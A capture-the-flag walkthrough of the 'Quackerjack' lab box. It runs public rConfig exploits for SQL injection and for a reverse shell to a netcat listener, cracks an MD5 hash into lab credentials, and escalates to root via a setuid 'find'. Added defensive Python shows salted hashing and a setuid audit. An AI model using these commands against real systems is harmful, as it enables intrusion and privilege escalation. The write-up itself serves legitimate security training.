# Quackerjack

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-01cb4fe694c91019ffdb853743e8339974d59a35%2Fimage.png?alt=media)

## Nmap

```
sudo nmap 192.168.150.57 -sS -p- -sV 

PORT     STATE SERVICE     VERSION
21/tcp   open  ftp         vsftpd 3.0.2
22/tcp   open  ssh         OpenSSH 7.4 (protocol 2.0)
80/tcp   open  http        Apache httpd 2.4.6 ((CentOS) OpenSSL/1.0.2k-fips PHP/5.4.16)
111/tcp  open  rpcbind     2-4 (RPC #100000)
139/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: SAMBA)
445/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: SAMBA)
3306/tcp open  mysql       MariaDB (unauthorized)
8081/tcp open  ssl/http    Apache httpd 2.4.6 ((CentOS) OpenSSL/1.0.2k-fips PHP/5.4.16)
Service Info: Host: QUACKERJACK; OS: Unix
```

## FTP

I performed a quick check for anonymous login on FTP and was returned a logon error.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-61d88e58a481f020b4884e765e519891e81a4c15%2Fimage.png?alt=media)

## SMB

As we had no luck with FTP, I then ran `enum4linux` against the target to look for users and groups and to perform RID cycling.

```
enum4linux -U -G -r 192.168.189.98
```

Unfortunately `enum4linux` did not return any relevant user information. I also checked null authentication against the target.

```
smbmap -u '' -p '' -R -H 192.168.150.57
```

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-925ae99260d361505b73b287f298cae850fef121%2Fimage.png?alt=media)

## HTTP

As we have HTTP running on ports 80 and 8081, we can run `gobuster` against both ports.

```
gobuster dir -u http://192.168.150.57 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -s 200 -x txt,zip,php
gobuster dir -u https://192.168.150.57:8081 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -s 200 -x txt,zip,php -k
```

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-629acc3448be3f072227c9cc141cc7727ce67328%2Fimage.png?alt=media)

The default page on port 80 is the CentOS Apache test page.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-f9a9a08bdb6b3def350d17899e8129e2ac8c3920%2Fimage.png?alt=media)

On port 8081 we come to a login page for rConfig. As we can see from the landing page, rConfig is running version 3.9.4.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-bdd37dbc2821607d7f8c9a17fbc10b5442421899%2Fimage.png?alt=media)

## Exploitation

A Google search reveals a multitude of exploits for rConfig across varying versions. I went through a fair few, some of which, specific to 3.9.4, I could not get to work. Eventually I came across a SQL injection exploit.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-c7ca60833124581fc3004c1695c6f07ece14638b%2Fimage.png?alt=media)

{% embed url="https://www.exploit-db.com/exploits/48208" %}

Run the exploit with the following syntax.

```
python3 exploit.py https://192.168.150.57:8081
```

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-b2ed38b8464d32271c1907625bcc2460ff78cac2%2Fimage.png?alt=media)

We manage to extract a hash. I identified this as an MD5 hash and was not able to crack it with `John` using rockyou.txt. I ended up putting the hash into online databases to find a match.

{% embed url="https://www.md5online.org/md5-decrypt.html" %}

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-0322d5fb71e08b70931f3cca8554e327aca07790%2Fimage.png?alt=media)

We now have the following credentials for rConfig.

```
admin:abgrtyu
```
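The reason the hash could be recovered from an online database rather than cracked is that it was an unsalted MD5 digest: the same password always yields the same digest, so one precomputed table serves every site. The following Python is an added example, not code from the page or from rConfig. It reverses an unsalted MD5 digest with a lookup table constructed here from a tiny wordlist, then shows how a salted, iterated hash (PBKDF2-HMAC-SHA256, assumed here as the replacement scheme) makes such a table useless.

```python
import hashlib
import hmac
import os


def md5_hex(password: str) -> str:
    """Unsalted MD5 as found on the target: one password, one digest, forever."""
    return hashlib.md5(password.encode()).hexdigest()


def build_lookup(wordlist):
    """Constructed stand-in for an online MD5 database: digest -> plaintext.
    Real services hold billions of pairs; the mechanism is identical."""
    return {md5_hex(word): word for word in wordlist}


def reverse_md5(digest: str, table: dict):
    """Recover a plaintext by table lookup, or None when it was never precomputed."""
    return table.get(digest.lower())


def hash_password(password: str, salt: bytes = None, iterations: int = 200_000) -> str:
    """Salted, iterated hash. A fresh 16-byte salt per user means two users with the
    same password get different records, and no table built in advance can match."""
    salt = salt if salt is not None else os.urandom(16)
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, iterations)
    return f"pbkdf2_sha256${iterations}${salt.hex()}${dk.hex()}"


def verify_password(password: str, stored: str) -> bool:
    """Recompute with the stored salt/iterations; compare in constant time."""
    _algo, iterations, salt_hex, dk_hex = stored.split("$")
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(),
                             bytes.fromhex(salt_hex), int(iterations))
    return hmac.compare_digest(dk.hex(), dk_hex)


if __name__ == "__main__":
    table = build_lookup(["password", "abgrtyu", "letmein"])   # constructed wordlist
    print("md5 lookup ->", reverse_md5(md5_hex("abgrtyu"), table))
    record = hash_password("abgrtyu")
    print("pbkdf2 record in table?", reverse_md5(record, table))
    print("verify correct:", verify_password("abgrtyu", record))
```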

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-be19f3eef46c4301caf80d47ba09b0228503bbd0%2Fimage.png?alt=media)

## Exploitation (Authenticated)

Now that we are authenticated, we can search for authenticated exploits. I soon came across an authenticated remote code execution exploit for 3.9.3. Whilst not intended for our version, 3.9.4, we can try it anyway.

{% embed url="https://www.exploit-db.com/exploits/47982" %}

Looking at the exploit code, it appears we supply the arguments below and the payload will then attempt a bash reverse shell back to us.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-5c3c508b0374ca875f4682cf2744e3df9aa542d0%2Fimage.png?alt=media)

First, set up a `netcat` listener on our attacking machine. I am going to use port 80, as this is a common port for outbound traffic.

```
sudo nc -lvp 80
```

Then execute the exploit with the following syntax:

```
python3 ./exploit.py https://<Target-IP>:8081 admin abgrtyu <Attacking-IP> 80
```

Once we have run the exploit we should get a shell back on our listener.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-d16c551bb13b57ad931e6b154a2a3a89753e88af%2Fimage.png?alt=media)

We confirm we are the apache user.

## Privilege Escalation

In the home directory we have the user 'rConfig'. I grabbed the local.txt flag and then started a Python `SimpleHTTPServer` on my attacking machine. I then uploaded `linpeas.sh` to aid with privilege escalation.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-4ac34e4bb513496340da9784061087db7cb206ae%2Fimage.png?alt=media)

After running `linpeas` and going through the results, we actually have various potential exploits. I will be focusing on the SUID bit being set on the `find` binary.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-dfa8072bc5d95035f127c14deffb9181ac49deed%2Fimage.png?alt=media)

We can check [GTFOBins](https://gtfobins.github.io/gtfobins/find/) for how we can use the binary for privilege escalation.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-b03f2bc97f0e8cdf8e5b63282b346ea245e7355d%2Fimage.png?alt=media)

Let's use the syntax above, call the binary and see if we can escape the restricted shell as root.

```
/usr/bin/find . -exec /bin/sh -p \; -quit
```

Once we escape, we should have a root shell.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-2a89dd51d653d8c1f445ea3a0870b34cc32b6244%2Fimage.png?alt=media)
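From the defender's side, a setuid `find` is exactly the kind of finding a periodic audit should catch before linpeas does. The following Python is an added example, not code from the page or from linpeas. It enumerates setuid files under a root, compares them against a baseline allowlist (the list below is constructed and illustrative; build the real one from a known-good image of your own build) and emits the `chmod u-s` remediation for anything unexpected.

```python
import os
import stat

# Constructed, illustrative baseline of setuid binaries a CentOS 7 host normally carries.
# Generate your real baseline from a known-good image rather than trusting this list.
EXPECTED_SUID = {
    "/usr/bin/passwd", "/usr/bin/su", "/usr/bin/sudo", "/usr/bin/mount", "/usr/bin/umount",
    "/usr/bin/chage", "/usr/bin/gpasswd", "/usr/bin/newgrp", "/usr/bin/chsh", "/usr/bin/chfn",
    "/usr/bin/pkexec", "/usr/bin/crontab", "/usr/sbin/unix_chkpwd", "/usr/sbin/pam_timestamp_check",
}


def list_suid(root="/"):
    """Return the set of regular files under `root` with the setuid bit set.

    lstat is used so symlinks are not followed, and unreadable paths are
    skipped so the audit does not abort part-way through the filesystem."""
    found = set()
    for dirpath, _dirnames, filenames in os.walk(root):
        for name in filenames:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)
            except OSError:
                continue
            if stat.S_ISREG(st.st_mode) and st.st_mode & stat.S_ISUID:
                found.add(path)
    return found


def unexpected_suid(found, expected=EXPECTED_SUID):
    """Setuid files not on the baseline, sorted for stable reporting and diffing."""
    return sorted(p for p in found if p not in expected)


def remediation(paths):
    """Commands that strip the setuid bit; on this box /usr/bin/find would be listed."""
    return [f"chmod u-s {p}" for p in paths]


if __name__ == "__main__":
    for line in remediation(unexpected_suid(list_suid("/usr"))):
        print(line)
```

Run it from cron or a configuration-management check and alert on any non-empty output; the diff against the baseline is the signal, so keep the baseline under version control.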
